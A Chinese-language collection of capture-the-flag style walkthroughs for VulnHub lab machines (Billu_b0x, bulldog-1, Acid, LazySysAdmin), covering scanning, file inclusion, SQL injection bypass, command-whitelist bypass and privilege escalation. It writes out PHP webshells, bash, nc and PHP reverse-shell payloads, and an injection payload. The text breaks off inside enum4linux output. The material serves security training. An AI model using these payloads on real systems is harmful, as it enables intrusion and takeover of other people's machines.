攻击机:同网段下有Windows攻击机,安装有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、 AWVS、Nessus等渗透工具,kali攻击机,主要用Windows攻击机完成实验。 信息收集 ip发现 启动Billu_b0x虚拟机,由于虚机网络设置为net模式,使用Nmap扫描VMware Network Adapter VMnet8网卡的 NAT网段C段IP,即可找到虚机IP,命令: nmap -sP 获得靶机ip 端口和服务识别 使用nmap扫描1-65535全端口,并做服务识别和深度扫描(加-A参数),扫描结果保存到txt文件,命令: nmap -p1-65535 -A -oN billu.txt 发现目标主机端口和服务如下: 端口 协议 后端服务 TCP 22 SSH OpenSSH 5.9p1 TCP 80 HTTP Apache httpd 2.2.22 进入web首页:发现用户名口令输入框,并提示“Show me your SQLI skills”。 漏洞挖掘 漏洞挖掘思路: (1) SQL注入:首页提示注入,想办法注入成功。 (2) 暴破目录:用DirBuster暴破,看是否有新网页,找新漏洞; (3) 漏洞扫描:暴破的新网页,送进AWVS或APPScan扫漏洞; (4) 手动挖掘:暴破的新页面,通过Firefox挂burp代理,在burp中观察Request和Response包,手动找漏洞; (5) 查看每个网页的源码,看是否有提示;。 (6) 如得到用户名,密码,尝试登录ssh,如能连接上,无需反弹shell了。 步骤1:测试首页SQL注入 (1) 在用户名输入框输入 admin' or 'a'='a -- 密码随意,发现无法注入,出现js弹框Try again: (2) 使用sqlmap进行post注入测试,命令: sqlmap.py -u “” --data "un=admin&ps=admin&login=let%27s+login" --level 3 --dbms mysql sqlmap注入检测完成,结果无法注入,目前不知道系统对注入的过滤规则是什么,使用几个sqlmap的tamper测 试也未成功。暂时先不fuzz注入,看看暴破目录。 步骤2:windows使用DirBuster暴破目录,同时使用kali Linux的dirb暴破,为得到更多的暴破结果,并减少 暴破时间: 得到页面较多,test.php、add.php、in.php、c.php、index.php、show.php等,目录有:uploaded_images, phpmy依次访问: 步骤3:利用文件包含漏洞获取php源码、passwd文件 (1) 访问test.php:页面提示file参数为空,需要提供file参数 测试文件包含: 发现无法包含,跳转会首页。 (2) 在Firefox的Hackbar或者Brupsuit中,将get请求,变更为post请求,文件包含成功,获得passwd文件。 使用hackerbar post数据,可下载passwd文件: 使用burpsuit中选择Change request method,将get请求转换为post请求,获得passwd文件成功: (3) 通过同样文件包含的方法,下载add.php、in.php、c.php、index.php、show.php、panel.php等文件,后面 可以访问文件的同时,审计文件的源代码。 (4) 查看passwd文件,发现1个id 1000的账号ica,ssh连接的用户名可以是ica或root: 步骤4:访问add.php、in.php页面和审计代码 add.php是一个上传界面,但是功能无法使用,查看源码文件发现只是个页面,没有后台处理代码。in.php是php info信息。 步骤5:查看c.php源码 这是数据库连接文件,发现mysql连接用户名密码: 用户名:billu 密码:b0x_billu 数据库名:ica_lab 步骤6:通过得到的mysql密码登录phpmyadmin失败 (1) 通过dirb暴破出/phpmy目录,访问该目录到phpmyadmin登录页面: 使用mysql密码尝试登录phpmyadmin:可是无法登录。目前得到一个ssh用户是ica,mysql连接账号billu和密码 b0x_billu,尝试登录ssh和phpmyadmin都失败。 目前SQL注入绕过没有成功,得到的mysql连接密码无法登录phpmyadmin。 初步推测虚拟机故障:mysql没有正常启动,稍后打算单用户模式进入Ubuntu排查。 步骤7:继续暴破phpmy目录,文件包含phpmyadmin配置文件 (1) phpmyadmin的默认的配置文件是:config.inc.php。需要猜测路径,通过URL猜测路径默认 在/var/www/phpmy下面。 (2) 在火狐浏览器的Hackbar或者Burpsuit中,通过文件包含,读取config.inc.php文件,Hackbar的获取方法: 在配置文件中发现root密码:roottoor (3) Burpsuit的获取方法: 步骤8:使用xshell ssh登录root账号,完成实验 步骤9:排查mysql故障 至此已经获得root权限,但是之前的phpmyadmin无法登录问题,怀疑mysql故障,root登录后,查看mysql状态 为:mysql stop/waiting,推测mysql被之前的高线程目录暴破、扫描导致故障,尝试重启mysql失败,决定重新 安装虚拟机。 虚机重新安装后,ssh登录,查看mysql运行状态正常,但是新虚机的IP变成:。 步骤10:回到步骤6,通过得到的mysql密码登录phpmyadmin 用户名:billu,密码:b0x_billu,登录成功。 在 ica_lab 数据库的auth表中,找到web登录的用户名:biLLu,密码:hEx_it。 获取shell 步骤11:登录index首页,并获得cmd shell和反弹shell (1) 使用web密码登录首页,大小写必须一样。 登录后是账号管理界面,账号是加勒比海盗的两位主角船长:杰克·斯帕罗和巴博萨船长。多写一句,本人更喜欢巴 博萨船长,一个像敌人一样的海盗朋友,幽默、勇敢、阴险狡诈、霸道野心、老谋深算。 两个账号的头像图片地址,在之前暴破出来: (2) 点击add user进入添加账号界面,这是一个图片上传,思路是利用图片上传和文件包含获得shell。 查看之前test文件包含获得的panel.php源码,发现panel.php存在本地文件包含漏洞: 下载一张 中的图片jack.php,文本编辑器打开,在文件中间或末尾加 入一句话cmd命令马 <?php system($_GET['cmd']); ?> 将文件上传成功。 (3) 使用burp执行命令: post请求url中加入执行命令的参数: POST /panel.php?cmd=cat%20/etc/passwd;ls post的body中包含cmd.jpg图片马: load=/uploaded_images/cmd.jpg&continue=continue 成功执行命令 cat /etc/passwd;ls (4) 用bash反弹shell 命令:echo "bash -i >& /dev/tcp/ 0>&1" | bash 需要将命令url编码: 在post的url中发送命令: nc接收反弹shell成功: 步骤12:找一个可写权限目录,写入菜刀马 文件上传目录uploaded_images为写权限目录,进入该目录,写一个菜刀马: echo '<?php eval($_POST['123456']);?>' >> caidao.php 菜刀连接成功,方便传文件。 提升权限 步骤13:查看内核、系统版本,寻找提权exp (1) 查看系统内核版本,命令 uanme -a 和 cat /etc/issue (2) 下载Ubuntu著名的本地提权漏洞exp: https://www.exploit-db.com/exploits/37292/ 步骤14:编译、提权 (1) 赋予执行权限 chmod 777 37292.c (2) 编译exp gcc 37292.c -o exp (3) 执行exp,提权至root 思路总结 其他渗透思路 正常的思路有3条路线可以突破。 思路1:构造注入:从test的文件包含获得index.php源码,源码中可查看到过滤sql的方法,针对性构造sql注入, 登录后获取shell再提权。 (1) 审计index.php源码,发现以下过滤规则: $uname=str_replace('\'','',urldecode($_POST['un'])); $pass=str_replace('\'','',urldecode($_POST['ps'])); str_replace的作用是将字符串\' 替换为空,因此构造SQL注入登录payload时,必须含有\'字符串,否则会报错。 urldecode的作用是将输入解码。 (2) 常见的利用注入登录的payload是' or 1=1 -- 修改这个在最后增加\',str_replace会将这个\'替换为空。 使用php在线调试工具,测试如下: (3) 注入成功,payload是' or 1=1 -- \' 后面获取shell方法和上面实验相同。 思路2:暴破出phpmyadmin,文件包含从c.php获得mysql密码,登录phpmyadmin,再获取shell。 思路3:文件包含所有有权限查看的配置文件,从phpmyadmin配置文件获得root密码,然后ssh登录。该过程尽 管mysql故障,也可以完成。 踩到的坑 (1) mysql被高线程目录暴破和注入宕机:导致phpmyadmin有正确密码但无法登录,耗费较长时间。这是意外故 障。因为之前的2个工具同时目录暴破、sqlmap注入等线程过高,导致mysql死了。 (2) test.php文件包含漏洞利用,get不行,改为post试试。包含成功后,要把各个页面的源代码拿下来审计。 (3) index.php的SQL注入花费不少时间,后来发现,即使不用sql注入,也有其他道路可以完成,通过 phpmyadmin登录,绕过了注入。 (4) panel.php的文件包含漏洞,如果不认真关注源码,难以发现。使用test.php的文件包含,没能触发shell利用。 (5) 文件上传+文件包含拿shell是靶机常用的方式,遇到两个漏洞,可以熟练拿shell。 (6) 提权方法可以多关注主要的配置文件、数据库连接文件、用户的文件;也可以利用Ubuntu已知漏洞本地提权。 第三节 bulldog-1 靶机信息 下载链接 https://download.vulnhub.com/bulldog/bulldog.ova 靶机说明 牛头犬行业最近的网站被恶意的德国牧羊犬黑客破坏。这是否意味着有更多漏洞可以利用?你为什么找不到 呢?:) 这是标准的Boot-to-Root,目标是进入root目录并看到祝贺消息。 目标 获得root权限和flag。 运行环境 靶机:用VirtualBox启动虚机,导入镜像,网络连接方式设置为桥接到无线网卡。靶机启动后,自动获得IP:。 Windows攻击机:物理机,连接无线网卡,自动获取IP:,安装有Burpsuit、nc、Python2.7、 DirBuster等渗透工具。 Kali攻击机:VMWare启动虚机,桥接到无线网卡,自动获取IP:。攻击机二选一即可。 信息收集 ip发现 靶机启动后,自动获得IP,并且显示在启动完成后的界面,IP为:。无需使用Nmap扫描C段发现IP。 端口和服务识别 使用nmap扫描1-65535全端口,并做服务指纹识别,扫描结果保存到txt文件,命令: nmap -p1-65535 -A -oN bulldog.txt 发现目标主机端口和服务如下: 端口 协议 后端服务 TCP 23 SSH open-ssl 7.2p2 TCP 80 HTTP WSGIServer Python 2.7.12 TCP 8080 HTTP WSGIServer Python 2.7.12 操作系统:Linux 3.2-4.9 漏洞挖掘 作者:红日安全 首发安全客:https://www.anquanke.com/post/id/106459 web漏洞思路: (1) 查看每个网页的源码,看是否有提示; (2) 暴破目录,用DirBuster,看是否有新网页,找新网页的漏洞; (3) 找注入或框架漏洞:如果网页有输入框、URL参数,可AWVS扫描注入;如果web使用了某些CMS框架,只能找 框架的通用漏洞,通常扫描不到注入。 ssh利用思路: (1) 如得到用户名,可以用就九头蛇或美杜莎暴破弱口令,但需要强大的字典且有弱口令。 (2) 如果得到web管理或系统账号,可以尝试连接ssh,如能连接上,无需反弹shell了。 步骤1:浏览网页,暴破目录 (1) 访问 进入首页: 首页有链接,点击进入notice页面,未发现有价值的信息。 (2) 使用DirBuster暴破目录,得到dev和admin目录: (3) 访问 ,这是一个Django管理后台,需要用户名、密码登录,试了下没有常见弱口 令,先不尝试暴破,去看看其他页面。 (4) 访问 ,该页面的有价值信息非常多,主要信息: 新系统不在使用php或任何CMS,而是使用Django框架开发。这意味着不太可能再找到网页的注入漏洞,只能找 Django框架漏洞;网站不使用php,无需再找php漏洞或者写php木马; 新系统使用webshell管理,有一个Web-shell链接,点击可访问 ,但是需要认证。 步骤2:破解hash (1) 查看 页面源码,会发现有每个Team Lead的邮箱和hash: 并且有明显的英文提示:We'll remove these in prod. It's not like a hacker can do anything with a hash。 (2) hash长度为40位,可以看出是sha1,即使不知道是哪种hash,也可以把每个hash值,到CMD5尝试碰撞解 密: (3) 最终解密出2个hash值: Back End: nick@bulldogindustries.com 用户名:nick,密码:bulldog (CMD5可免费解密出来) Database: sarah@bulldogindustries.com 用户名:sarah,密码:bulldoglover (CMD5需要收费解密出来) 步骤3:登录后台 (1) 使用解密出来的密码尝试登录扫描出来的23端口ssh都失败: (2) 使用sarah、密码bulldoglover成功登录管理后台,发现没有编辑权限。 (3) 再去访问webshell页面,已通过认证,可执行命令,这是一个命令执行界面: 获取shell 步骤4:绕过白名单限制,执行系统命令: webshell页面只能执行白名单的命令,尝试用;或者&&连接,执行多个命令: ls是白名单命令,id是禁止命令,通过 ls && id 可成功执行id命令,达到绕过白名单限制执行命令。 步骤5:反弹shell: (1) Windows攻击机开启nc监听: nc -lvnp 4444 (2) 直接执行 ls && bash -i >& /dev/tcp/ 0>&1 失败,server报错500。 (3) 尝试多次bash反弹,最后使用echo命令先输出命令,再输入到bash,反弹shell成功: echo "bash -i >& /dev/tcp/ 0>&1" | bash 提升权限 步骤6:查看有哪些系统用户 cat /etc/passwd , 发现需要关注的用户有:bulldogadmin、django 步骤7:查找每个用户的文件(不显示错误) find / -user bulldogadmin 2>/dev/null (1) 发现值得关注的文件有:一个是note,一个是customPermissionApp。 /home/bulldogadmin/.hiddenadmindirectory/note /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp (2) 打开note文本文件:发现提示webserver有时需要root权限访问。 (3) 打开customPermissionApp,看上去是可执行文件,使用strings打印其中的可打印字符: strings /home/bulldogadmin/.hiddenadmindirectory/customPermissionApp note文件中提示执行该文件,可以获得root权限,但通过ls查看文件权限只有读权限,并无法执行。 步骤8:拼接root密码提权 (1) 观察文件中只有这些字符,疑似可能与密码相关,英文单词包括:SUPER、 ulitimate、PASSWORD、 youCANTget,这些都与最高权限账号相关,推测这是一个解谜题目: 最直接的组合是去掉H,变成一句通顺的英文句子:SUPERultimatePASSWORDyouCANTget (2) su命令无法执行,提示:must be run from a terminal,上次Vulhub已经遇到过该问题,通过一句Python解 决: python -c 'import pty;pty.spawn("/bin/bash")' (3) 执行 sudo su - ,获得root权限,获取flag: (4) 如果不解决无法su,还记得有23端口的ssh,也可以使用Xshell通过ssh登录,登录成功后执行sudo su - 提权并 获得flag 用户名: django 密码: SUPERultimatePASSWORDyouCANTget 不用猜测的密码,改了django再登录也可以。 sudo su提权,密码是: SUPERultimatePASSWORDyouCANTget 靶场思路回顾 1.目录暴破出dev和admin页面: (1) 可暴破出dev页面,该页面源码里面有多个账号的用户名、邮箱、密码sha1值。该页面还链接到webshell命令 执行页面。 (2) 可暴破出admin后台页面,登录密码通过dev页面破解sha1得到。 2.绕过白名单限制,执行命令和反弹shell:绕过限制执行命令比较容易。反弹shell尝试多次使用bash反弹shell后 成功,没有尝试py shell。 3.搜索系统中id为1000以后的用户的文件,可以找到隐藏文件。 4.猜解root密码很艰难。 思路总结 难点和踩到的坑 (1) 发现和破解sha1:在dev页面查看源码,发现多个用户hash后,即使不知道是40位的sha1,也可以直接去 cmd5破解,系统会自动识别,可以破解出2个账号。如果用hashcat暴破sha1,需要强大的字段和较长的时间。 (2) 反弹shell应该有多种方法:第一个想到的是bash shell,也想到了python反弹shell。只尝试了通过bash反弹 shell,如果bash反弹不成功,可尝试往系统echo文件,赋予+x执行权限,执行脚本反弹。也可尝试Python是否能 够反弹shell。 (3) 发现隐藏的包含root密码的文件,通过搜索id为1000之后的用户文件,查看历史命令,或者查看目录,也可能 找到。 (4) 猜解root密码:这个是最难的,找到这个文件并不难,但是通过strings查看文件内容,并且拼接字符串为root 密码,感觉难度很大。 第四节 Acid 靶机信息 下载链接 https://download.vulnhub.com/acid/Acid.rar 靶机说明 Welcome to the world of Acid. Fairy tails uses secret keys to open the magical doors. 欢迎来到Acid的世界。童话故事需要使用秘密钥匙打开魔法门。 目标 作者:红日安全 首发安全客:https://www.anquanke.com/post/id/10546 获得root权限和flag。 运行环境 靶机配置:该虚拟机完全基于Web,提取rar并使用VMplayer运行vmx,网络连接方式设置为net,靶机自动 获取IP。 攻击机配置:同网段下有Windows攻击机,安装有Burpsuit、nc、Python2.7、DirBuster、御剑等渗透工 具。 信息收集 ip发现 启用Acid虚拟机,由于网络设置为net模式,使用Nmap扫描VMware Network Adapter VMnet8网卡的NAT网段, 即可找到虚机IP,扫描结果保存到txt文件,命令: nmap -sP -oN acid-ip.txt 获得目标ip 端口扫描 使用nmap扫描1-65535全端口,并做服务指纹识别,扫描结果保存到txt文件,命令: nmap -p1-65535 -sV -oN acid-port.txt 目标主机的33447端口发现web服务,web服务器是Apache2.4.10,操作系统ubuntu。 进入主页: 服务识别 只发现web服务和Apache,只能从web漏洞或者Apache漏洞入手(如有漏洞): 端口:Tcp 33447 底层服务:Apache2.4.10 操作系统:Ubuntu 漏洞挖掘的详细思路 web挖掘思路: (1) 查看每个网页的源码,看是否有提示; (2) 暴破目录,用御剑或DirBuster,看是否有新网页,找新网页的漏洞; Apache挖掘思路: (1) 寻找Apache2.4.10有无已知漏洞可利用:没有发现可直接利用的漏洞。 (2) 到www.exploit-db.com查询有无exp:没有找到exp。 (3) Nessus扫描一下主机漏洞:没有扫描出漏洞。 实在找不到漏洞:单用户模式进入Ubuntu,看源码吧。 步骤1:首先看主页源码,发现提示:0x643239334c6d70775a773d3d 0x是16进制编码,将值643239334c6d70775a773d3d进行ASCII hex转码,变成:d293LmpwZw== 发现是base64编码,再进行解码,得到图片信息 wow.jpg 这时可以根据经验在首页直接加目录打:/image/wow.jpg 或者 /images/wow.jpg 或者 /icon/wow.jpg 网站的图片 目录通常是这样命名。也可以利用dirbuster进行目录爆破,得到图片目录images。 访问 得到图片: 将图片保存到本地,用Notepad++打开,发现最下边有提示 将3761656530663664353838656439393035656533376631366137633631306434进行ASCII hex转码,得到 7aee0f6d588ed9905ee37f16a7c610d4,这是一串md5。 去cmd5解密,得到63425,推测是一个密码或者ID。 步骤2:使用Dirbuster进行目录暴破: 查看暴破结果:发现challenge目录,该目录下有cake.php、include.php、hacked.php,用Burpsuit挂上代理, 使用Firefox然后依次访问3个文件: 步骤3:访问cake.php,发现需要登录后才能访问: 该页面如果看页面title或者看burpsuit的Response返回值的,会发现有/Magic_Box目录存在,先看其他页面。 点击login会跳转到index.php登录页面,需要email和密码才能登录: 步骤4:访问include.php,这是一个文件包含漏洞页面: 在输入框中输入 /etc/passwd 测试存在文件包含,Burpsuit显示response包如下: 想文件包含拿shell,但没有文件上传点,之前发现的wow.jpg中无木马可包含。先继续看hacked.php。 步骤5:访问cake.php,需要输入ID,测试下之前从wow.jpg解密出来的数字:63425 然后,什么也没有发生,看来ID不对,或者需要先通过index页面输入email和密码登录。 步骤6:找注入,把发现的几个页面都送入AWVS扫描了漏洞,未发现注入。 步骤7:继续暴破发现的Magic_Box目录:发现low.php,command.php 步骤8:访问low.php是个空页面,访问command.php,发现命令执行界面: 可执行系统命令,输入192.168.64.1;id 查看burpsuit的response发现id命令执行成功。 获取shell 步骤9:利用php反弹shell。Windows开启nc,监听4444端口: 为避免转义和中断,在get、post请求中输入payload需要进行url编码。尝试bash反弹shell、nc反弹shell,如下 payload都失败: bash -i >& /dev/tcp/ 0>&1 nc -e /bin/bash -d 4444 通过php反弹shell成功,将如下payload进行URL编码后,在burp中发送: php -r '$sock=fsockopen("",4444);exec("/bin/sh -i <&3 >&3 2>&3");' nc成功接收反弹shelll: 但是无法执行su命令,回显su: must be run from a terminal 需要一个终端。没有想出办法,最终google了一 下,找到答案:用python调用本地的shell,命令: echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py python /tmp/asdf.py 执行su成功: 提升权限 步骤10:查看有哪些的用户 cat /etc/passwd ,发现需要关注的用户有:acid,saman,root 步骤11:查找每个用户的文件(不显示错误) find / -user acid 2>/dev/null 发现/sbin/raw_vs_isi/hint.pcapng文件,这是一个网络流量抓包文件,将其拷贝的kali上,用Wireshark打开: scp /sbin/raw_vs_isi/hint.pcapng root@ 只看TCP协议的包,发现saman的密码:1337hax0r 步骤12:su提权到saman、root,获得flag 再使用sudo -i 提权到root,密码同样是1337hax0r,获得位于root目录的flag.txt。 靶场思路回顾 作者的设计思路可参考国外的一篇渗透文章: http://resources.infosecinstitute.com/acid-server-ctf- walkthroug h 主要突破点是: 1.两次目录暴破,第一次暴破出challenge,目录、cake.php、include.php、hacked.php,第二次暴破 Magic_Box目录发现command.php。 2.发现命令执行界面后,用php反弹shell,在http中传输需对payload进行url编码。 3.su提权需要一个终端,没有经验只能Google解决了。 4.提权的方法是通过查找已知用户的文件,发现其密码,未使用exp或msf提权。 思路总结 主要收获 1. 命令执行漏洞可使用php反弹shell, 以前都是用bash或nc。 2. su提权需要一个终端,使用Python解决。 3. 获得shell后,多多查找各个用户文件,可能有新发现。 踩到的坑 1. 文件包含漏洞,没找到利用方式,也找不到上传点,无法包含获得shell; 2. su提权需要一个终端,没有知识储备和经验,依靠高手指导和Google搜索解决。 3. index.php页面获得邮件用户名和密码的方法太冷门了,如果不是看国外的教程,自己无法想到。 4. 发现目录就暴破下,使用御剑默认字典不行,只能使用OWASP的暴破字典,目录暴破绕过了上面邮件用户名 和口令的登录,可以一路暴破到命令执行页面。 总之,在没有google搜索和他人的指导下,自己没能独立完成,后续需要开阔思路,多多练习。 第五节 LazySysAdmin: 1 靶机信息 下载链接 https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip 运行环境 Virtualbox (二选一) Vnware Workstation player 通关提示 Enumeration is key Try Harder Look in front of you Tweet @togiemcdogie if you need more hints 信息收集 ip发现 在内网主机探测中,可以使用netdiscover来进行。 netdiscover -i wlo1 端口扫描 使用masscan扫描 ➜ evilk0 netdiscover -i wlo1 Currently scanning: | Screen View: Unique Hosts 1 Captured ARP Req/Rep packets, from 1 hosts. Total size: 42 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 08:00:27:da:8a:ac 1 42 PCS Systemtechnik GmbH masscan -p 1-10000 --rate=1000 使用nmap扫描 nmap -T4 -A -v -p 0-10000 ➜ evilk0 masscan -p 1-10000 --rate=1000 Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2018-01-31 12:53:27 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [10000 ports/host] Discovered open port 3306/tcp on Discovered open port 6667/tcp on Discovered open port 22/tcp on Discovered open port 139/tcp on Discovered open port 80/tcp on Discovered open port 445/tcp on ➜ evilk0 nmap -T4 -A -v -p0-10000 Starting Nmap 7.50 ( https://nmap.org ) at 2018-01-31 20:55 CST ................................. Scanning LazySysAdmin.lan ( [10001 ports] Discovered open port 80/tcp on Discovered open port 22/tcp on Discovered open port 139/tcp on Discovered open port 445/tcp on Discovered open port 3306/tcp on Discovered open port 6667/tcp on ................................. PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA) | 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA) | 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA) |_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Silex v2.2.7 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 4 disallowed entries |_/old/ /test/ /TR2/ /Backnode_files/ |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Backnode 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 3306/tcp open mysql MySQL (unauthorized) 6667/tcp open irc InspIRCd | irc-info: | server: Admin.local | users: 1.0 | servers: 1 | chans: 0 | lusers: 1 | lservers: 0 | source ident: nmap | source host: |_ error: Closing link: (nmap@ [Client exited] MAC Address: 08:00:27:DA:8A:AC (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.8 Uptime guess: 0.008 days (since Wed Jan 31 20:44:16 2018) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | Names: | LAZYSYSADMIN<00> Flags: <unique><active> | LAZYSYSADMIN<03> Flags: <unique><active> | LAZYSYSADMIN<20> Flags: <unique><active> | WORKGROUP<00> Flags: <group><active> |_ WORKGROUP<1e> Flags: <group><active> | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: lazysysadmin | NetBIOS computer name: LAZYSYSADMIN\x00 | Domain name: \x00 | FQDN: lazysysadmin |_ System time: 2018-01-31T22:55:23+10:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smbv2-enabled: Server supports SMBv2 protocol TRACEROUTE HOP RTT ADDRESS 1 0.50 ms LazySysAdmin.lan ( NSE: Script Post-scanning. Initiating NSE at 20:55 Completed NSE at 20:55, 0.00s elapsed Initiating NSE at 20:55 Completed NSE at 20:55, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at 对比可发现masscan扫描端口的速度比nmap快很多,但是想要知道端口所运行服务的具体信息,就要用到nmap 了。根据扫描结果可知目标机开启了22、80、139、445、3306、6667这几个端口。 先从web入手,使用dirb来爆破目标存在的目录(dirb安装方法附在文章最后) 在工具扫描的同时,手工探测漏洞利用点。访问目标web服务,未发现什么,查看是否存在robots.txt发现4个目 录,并且存在目录遍历漏洞,但是并没用获取到可以利用的信息。 使用curl获取目标web的banner信息,发现使用的中间件是apache2.4.7,目标系统为Ubuntu。 https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 31.19 seconds Raw packets sent: 11045 (487.680KB) | Rcvd: 11034 (442.816KB) ➜ evilk0 ./dirb wordlists/common.txt -o /home/evilk0/Desktop/result.txt 用法:./dirb 目标url 用于爆破的目录 -o 输出文件 User-agent: * Disallow: /old/ Disallow: /test/ Disallow: /TR2/ Disallow: /Backnode_files/ 再来查看dirb扫描结果,发现目标文章用的是wordpress,且还有phpmyadmin。 wpscan扫描结果 ➜ evilk0 curl -I HTTP/1.1 200 OK Date: Wed, 31 Jan 2018 13:01:20 GMT Server: Apache/2.4.7 (Ubuntu) Last-Modified: Sun, 06 Aug 2017 05:02:15 GMT ETag: "8ce8-5560ea23d23c0" Accept-Ranges: bytes Content-Length: 36072 Vary: Accept-Encoding Content-Type: text/html ➜ dirb222 cat /home/evilk0/Desktop/result.txt | grep "^+" + (CODE:200|SIZE:36072) + (CODE:200|SIZE:77257) + (CODE:200|SIZE:92) + (CODE:403|SIZE:293) + (CODE:200|SIZE:18902) + (CODE:200|SIZE:8262) + (CODE:403|SIZE:300) + (CODE:200|SIZE:8264) + (CODE:401|SIZE:459) + (CODE:301|SIZE:0) + (CODE:405|SIZE:42) + (CODE:200|SIZE:252879) + (CODE:200|SIZE:5) + (CODE:302|SIZE:0) + (CODE:302|SIZE:0) + (CODE:200|SIZE:0) + (CODE:302|SIZE:0) + (CODE:302|SIZE:0) + (CODE:302|SIZE:0) + (CODE:302|SIZE:0) + (CODE:200|SIZE:0) + (CODE:200|SIZE:0) root@kali:~# wpscan _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 2.9.3 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_ _______________________________________________________________ [+] URL: [+] Started: Thu Feb 1 01:37:20 2018 [!] The WordPress '' file exists exposing a version number [+] Interesting header: LINK: <>; rel="https://api.w.org/" [+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu) [+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22 [!] Registration is enabled: [+] XML-RPC Interface available under: [!] Upload directory has directory listing enabled: content/uploads/ [!] Includes directory has directory listing enabled: includes/ [+] WordPress version 4.8.5 (Released on 2018-01-16) identified from meta generator, links opml [+] WordPress theme in use: twentyfifteen - v1.8 [+] Name: twentyfifteen - v1.8 | Last updated: 2017-11-16T00:00:00.000Z | Location: | Readme: [!] The version is out of date, the latest version is 1.9 | Style URL: | Theme Name: Twenty Fifteen | Theme URI: https://wordpress.org/themes/twentyfifteen/ | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple,... | Author: the WordPress team | Author URI: https://wordpress.org/ [+] Enumerating plugins from passive detection ... [+] No plugins found [+] Finished: Thu Feb 1 01:37:24 2018 [+] Requests Done: 356 [+] Memory used: 37.98 MB [+] Elapsed time: 00:00:04 enum4linux Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 1 00:46:08 2018 ========================== | Target Information | ========================== Target ........... RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ===================================================== | Enumerating Workgroup/Domain on | ===================================================== [+] Got domain/workgroup name: WORKGROUP ============================================= | Nbtstat Information for | ============================================= Looking up status of LAZYSYSADMIN <00> - B <ACTIVE> Workstation Service LAZYSYSADMIN <03> - B <ACTIVE> Messenger Service LAZYSYSADMIN <20> - B <ACTIVE> File Server Service WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections MAC Address = 00-00-00-00-00-00 ====================================== | Session Check on | ====================================== [+] Server allows sessions using username '', password '' ============================================ | Getting domain SID for | ============================================ Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ======================================= | OS information on | ======================================= [+] Got OS info for from smbclient: [+] Got OS info for from srvinfo: LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server platform_id : 500 os version : 6.1 server type : 0x809a03 ============================== | Users on | ============================== ========================================== | Share Enumeration on | ========================================== WARNING: The "syslog" option is deprecated Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers share$ Disk Sumshare IPC$ IPC IPC Service (Web server) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP [+] Attempting to map shares on //$ Mapping: DENIED, Listing: N/A //$ Mapping: OK, Listing: OK //$ [E] Can't understand response: WARNING: The "syslog" option is deprecated NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* ===================================================== | Password Policy Information for | ===================================================== [+] Attaching to using a NULL share [+] Trying protocol 445/SMB... [+] Found domain(s): [+] LAZYSYSADMIN [+] Builtin [+] Password Info for Domain: LAZYSYSADMIN [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: Not Set [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] 